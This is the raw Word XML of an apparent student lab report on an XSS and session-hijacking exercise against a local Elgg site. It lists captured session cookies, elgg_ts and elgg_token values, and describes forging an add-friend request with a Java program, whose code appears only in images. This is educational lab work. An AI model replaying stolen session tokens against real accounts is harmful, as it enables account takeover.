        </w:rPr>
        <w:t>executed automatical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Other lines are caused by what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d on another machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA2CF93" w14:textId="255FA055" w:rsidR="000E34E8" w:rsidRDefault="00034357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96B3CB" wp14:editId="0F62B387">
            <wp:extent cx="5274310" cy="1078230"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="30" name="图片 30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形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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0F8D1" w14:textId="11549428" w:rsidR="00E10CF3" w:rsidRPr="00E10CF3" w:rsidRDefault="00E10CF3" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc89727055"/>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E10CF3">
        <w:t>Task 4: Session Hijacking using the Stolen Cookies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="51AF6D7E" w14:textId="5F507586" w:rsidR="00E10CF3" w:rsidRPr="00BA621D" w:rsidRDefault="00BA621D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BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA621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Change the host file on VM 10.4.148.249 and let the host of </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="0079784B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.xsslabelgg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n this machine be 10.4.148.245 instead of 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BFFE94" w14:textId="327896F7" w:rsidR="00BA621D" w:rsidRDefault="00BA621D" w:rsidP="00E10CF3">
      <w:pPr>
        <w:jc w:val="left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445A85" wp14:editId="74518385">
            <wp:extent cx="3632200" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="0" b="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文本&#10;&#10;描述已自动生成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2A287" w14:textId="7A44815D" w:rsidR="00BA621D" w:rsidRDefault="00BA621D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BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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In the guide document it is said we ne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“stole”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two variables __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elgg_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__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elgg_tok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the victim as what we did in task 3. However, it is much more difficult to find these two guys in the document tree. (“cookie” is o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ocument.cooki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, which is very easy, but these two guy are hidden deeply)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3123BEC1" w14:textId="127CD83F" w:rsidR="00BA621D" w:rsidRPr="00BA621D" w:rsidRDefault="00BA621D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rstly, right click and go into the “inspect Element” then click “console”. Let’s start at “console.log(document)”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728CB7A" w14:textId="5A8099F7" w:rsidR="00BA621D" w:rsidRDefault="00BA621D" w:rsidP="00E10CF3">
      <w:pPr>
        <w:jc w:val="left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BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F2E516E" wp14:editId="6F8ACE19">
            <wp:extent cx="5274310" cy="1187450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="32" name="图片 32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文本, 应用程序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F7199" w14:textId="70816774" w:rsidR="00BA621D" w:rsidRPr="00BA621D" w:rsidRDefault="00BA621D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BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> after a hard work, I find these two guys here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7378AB" w14:textId="6A339B81" w:rsidR="00BA621D" w:rsidRDefault="00BA621D" w:rsidP="00E10CF3">
      <w:pPr>
        <w:jc w:val="left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BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E186B1" wp14:editId="1E3B0F77">
            <wp:extent cx="5274310" cy="2264692"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="图片 3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形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId26"/>
                    <a:srcRect t="7196"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2264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6CFA0" w14:textId="262C6DAC" w:rsidR="00BA621D" w:rsidRDefault="00BA621D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BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA621D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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tree path should be </w:t>
      </w:r>
      <w:r w:rsidR="00EA47D3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EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="00465748">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attibutes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[0].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nodeValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0032232C" w:rsidRPr="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.getElementsByClassName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0032232C" w:rsidRPr="003223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="0032232C" w:rsidRPr="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0032232C" w:rsidRPr="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-menu-content")[2].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0032232C" w:rsidRPr="0032232C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="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00EA47D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556AD8FA" w14:textId="308E57CC" w:rsidR="00EA47D3" w:rsidRPr="00465748" w:rsidRDefault="00465748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46574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FCAFEEE" wp14:editId="5F86BB9A">
            <wp:extent cx="5274310" cy="478790"/>
            <wp:effectExtent l="0" t="0" r="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1CE1B" w14:textId="31237828" w:rsidR="00EA47D3" w:rsidRDefault="00465748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ccess:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5534D" w14:textId="0154DA17" w:rsidR="004B26F8" w:rsidRPr="00BA621D" w:rsidRDefault="004B26F8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2F3F5942" wp14:editId="128DAB8A">
            <wp:extent cx="2997200" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="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2D8DF" w14:textId="0E4EC427" w:rsidR="00BA621D" w:rsidRDefault="00465748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5A21E3" wp14:editId="581D42F1">
            <wp:extent cx="5274310" cy="104775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54C4" w14:textId="24C3B840" w:rsidR="00BA621D" w:rsidRPr="00BA621D" w:rsidRDefault="00BA621D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038028F3" w14:textId="57816C89" w:rsidR="00BA621D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See how a real making friend http request goes</w:t>
      </w:r>
      <w:r w:rsidR="00B76161"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="00B76161" w:rsidRPr="00B76161">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LiveHTTPHeader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5C6A253" w14:textId="75B0F340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326C9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070CC9F" wp14:editId="47139050">
            <wp:extent cx="4578056" cy="2796108"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="图片 31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文本, 应用程序, 聊天或短信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21923" cy="2822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08F93" w14:textId="680D1CC5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C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lick “File Save” and see the text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A15AFD2" w14:textId="1607C2DB" w:rsidR="000C1189" w:rsidRP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0C118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2CB0CBF" wp14:editId="4F452F93">
            <wp:extent cx="5274310" cy="2237105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="图片 5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图形用户界面, 文本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46C05" w14:textId="47DFB08B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 is clear th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riend_us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Alice is 44</w:t>
      </w:r>
      <w:r w:rsidR="00341106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, here is what we have at this stage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341106" w14:paraId="4C625749" w14:textId="77777777" w:rsidTr="00341106">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A54CBA7" w14:textId="77777777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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42157626" w14:textId="69FFC232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341106" w14:paraId="5D987225" w14:textId="77777777" w:rsidTr="00341106">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73BB704C" w14:textId="6B2E1273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cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78CFF936" w14:textId="3C883FCE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1106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Elgg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00341106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=jl3jcgkqcv81ta2oi76o72suk5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00341106" w14:paraId="1968ED69" w14:textId="77777777" w:rsidTr="00341106">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C5FD414" w14:textId="4F49B82A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proofErr w:type="spellStart"/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elgg_ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4357C68D" w14:textId="24FA6E72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1638768085</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00341106" w14:paraId="62C874AC" w14:textId="77777777" w:rsidTr="00341106">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="696894FB" w14:textId="26D32133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proofErr w:type="spellStart"/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elgg_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C285818" w14:textId="2E778066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ithj6P_fyELS-2qEKrBypA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00341106" w14:paraId="78FF278B" w14:textId="77777777" w:rsidTr="00341106">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F30D050" w14:textId="534388D2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user_guid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB46122" w14:textId="42972C38" w:rsidR="00341106" w:rsidRPr="00341106" w:rsidRDefault="00341106" w:rsidP="003411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</w:tbl>
    <w:p w14:paraId="6B849B8F" w14:textId="77777777" w:rsidR="00341106" w:rsidRPr="00341106" w:rsidRDefault="00341106" w:rsidP="00E10CF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A2E247" w14:textId="6FCFB108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DC767AF" w14:textId="0DE8077C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 Fill in the java file with these </w:t>
      </w:r>
      <w:r w:rsidR="00341106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>four</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> things we just got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B93777" w14:textId="54833C50" w:rsidR="000C1189" w:rsidRDefault="004B26F8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49AD9E68" wp14:editId="405815F2">
            <wp:extent cx="5270500" cy="4089400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63" name="图片 6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3" descr="文本&#10;&#10;描述已自动生成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1189">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="000C1189">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) Compile and run the java code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D0AAF" w14:textId="5E09C554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0C1189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7E422D9" wp14:editId="71BD14EE">
            <wp:extent cx="5274310" cy="744220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="60" name="图片 6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ADB8A" w14:textId="7AF4DEEC" w:rsidR="000C1189" w:rsidRDefault="000C1189" w:rsidP="00E10CF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F1900DE" w14:textId="6B32066A" w:rsidR="000C1189" w:rsidRPr="00BA621D" w:rsidRDefault="000C1189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341106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Do the session hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAD77D6" w14:textId="21799CD1" w:rsidR="00BA621D" w:rsidRDefault="004B26F8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4B26F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181C1BC" wp14:editId="01308D10">
            <wp:extent cx="4683529" cy="2416196"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="61" name="图片 6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图形用户界面, 应用程序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91803" cy="2472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5CE5" w14:textId="46D9DBD7" w:rsidR="00465748" w:rsidRDefault="00465748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</w:t>
      </w:r>
      <w:r w:rsidR="000C1189">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>refreshing the page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817DB29" w14:textId="314F6F8A" w:rsidR="00465748" w:rsidRDefault="004B26F8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4B26F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6CB5576" wp14:editId="0C2141B5">
            <wp:extent cx="4705224" cy="2616593"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62" name="图片 62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 descr="图形用户界面, 文本, 应用程序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30281" cy="268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BF2C" w14:textId="4EF68A28" w:rsidR="004B26F8" w:rsidRPr="00341106" w:rsidRDefault="00341106" w:rsidP="00E10CF3">
      <w:pPr>
        <w:jc w:val="left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r w:rsidRPr="00341106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00341106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MG!!!!I made Alice be a friend of herself!!!</w:t>
      </w:r>
      <w:r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I used the cookie and tokens from Alice by mistake (when Alice clicked “save”). But now I am unable to remove this bad friendship…Just keep it and do it again with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u w:val="single"/>
        </w:rPr>
        <w:t>Bob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and Alice correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A34155" w14:textId="72E4E42A" w:rsidR="004B26F8" w:rsidRDefault="00341106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34110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94720E" wp14:editId="0848FB7F">
            <wp:extent cx="5274310" cy="368300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74722E" w14:paraId="028C4820" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B939807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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="083C0B5B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74722E" w14:paraId="234CF1FC" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AB7B197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cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5424D003" w14:textId="60DE0DE6" w:rsidR="0074722E" w:rsidRPr="0074722E" w:rsidRDefault="0074722E" w:rsidP="003C2004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74722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lgg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0074722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=n7f0k9j5r4utbb3d7q08tc7gh1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0074722E" w14:paraId="72358539" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59EC23CA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proofErr w:type="spellStart"/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elgg_ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5325F504" w14:textId="44682699" w:rsidR="0074722E" w:rsidRPr="0074722E" w:rsidRDefault="0074722E" w:rsidP="003C2004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4722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638770702</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0074722E" w14:paraId="1B42E6E5" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A44D5B2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proofErr w:type="spellStart"/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elgg_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC6B60E" w14:textId="08C8DC8A" w:rsidR="0074722E" w:rsidRPr="0074722E" w:rsidRDefault="0074722E" w:rsidP="003C2004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4722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JHgJKesnykg8O6cShUW4-g</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0074722E" w14:paraId="18D0F67B" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A08E52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user_guid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A80C34B" w14:textId="77777777" w:rsidR="0074722E" w:rsidRPr="00341106" w:rsidRDefault="0074722E" w:rsidP="003C2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110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</w:tbl>
    <w:p w14:paraId="521225D4" w14:textId="59B5E984" w:rsidR="00341106" w:rsidRDefault="0074722E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O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kay I hope this time everything will go correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CC425F" w14:textId="40BE16FB" w:rsidR="0074722E" w:rsidRDefault="0074722E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74722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2582FF7" wp14:editId="2F98B878">
            <wp:extent cx="3954326" cy="2480169"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="68" name="图片 6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 descr="文本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30026" cy="252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47A44" w14:textId="6DCC89EB" w:rsidR="00EF135E" w:rsidRDefault="00EF135E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EF135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AD3F1C8" wp14:editId="6828C6B4">
            <wp:extent cx="4299068" cy="1665298"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="图片 71" descr="报纸上的文字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71" descr="报纸上的文字&#10;&#10;中度可信度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09867" cy="1708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B29F" w14:textId="00BFC733" w:rsidR="0074722E" w:rsidRDefault="0074722E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kay this time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forced to have his first friend successfully</w:t>
      </w:r>
      <w:r w:rsidR="00EF135E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562DC20B" w14:textId="0856E08C" w:rsidR="0074722E" w:rsidRPr="0074722E" w:rsidRDefault="0074722E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4722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01F64F" wp14:editId="48F5C4C8">
            <wp:extent cx="3657600" cy="1929642"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="70" name="图片 70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70" descr="图形用户界面, 文本, 应用程序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71748" cy="193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4873B" w14:textId="5849AF24" w:rsidR="00341106" w:rsidRDefault="0074722E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3E274F32" wp14:editId="194890F8">
            <wp:extent cx="3760546" cy="1928717"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="69" name="图片 69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69" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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4673" cy="196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DA17" w14:textId="4DE16ACD" w:rsidR="00EF135E" w:rsidRDefault="00EF135E" w:rsidP="00E10CF3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF135E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6F4FD9E" wp14:editId="0FB27FE7">
            <wp:extent cx="3670300" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72" name="图片 7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72" descr="图形用户界面, 应用程序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703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B28EA" w14:textId="5F261FE2" w:rsidR="00EF135E" w:rsidRDefault="00EF135E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aft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A03BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>interesting</w:t>
      </w:r>
      <w:r w:rsidR="00C40292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mistake as what I explained before, </w:t>
      </w:r>
      <w:r w:rsidR="00A03BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
